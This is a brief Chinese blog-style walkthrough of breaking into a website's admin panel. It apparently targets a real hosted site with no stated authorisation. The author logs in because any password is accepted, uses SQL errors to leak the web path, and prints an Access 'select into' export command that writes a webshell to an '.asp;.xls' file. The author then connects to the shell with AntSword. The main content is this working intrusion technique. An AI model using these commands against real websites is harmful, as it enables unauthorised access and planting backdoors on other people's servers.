渗透一个网站通常先做信息收集,但是这次比较特殊,直接拿到的是网站后台的登录页面。先试试运气吧。
发现疑似后台,先进行尝试。进行弱口令尝试。发现意外惊喜,后台竟然任意密码登录,(这也是写这个博客的原因,运气太好了吧。)
登录完成,进入后台。
东逛逛西看看后,想办法上传webshell.
可以执行sql,那么先报错,拿到路径
数据库为access
进行导出一句话
select * into [a] in 'D:\freehost\charm358\web\a.asp;.xls' 'excel 4.0;' from shell
drop table shell
蚁剑连接shell
接下来看着办吧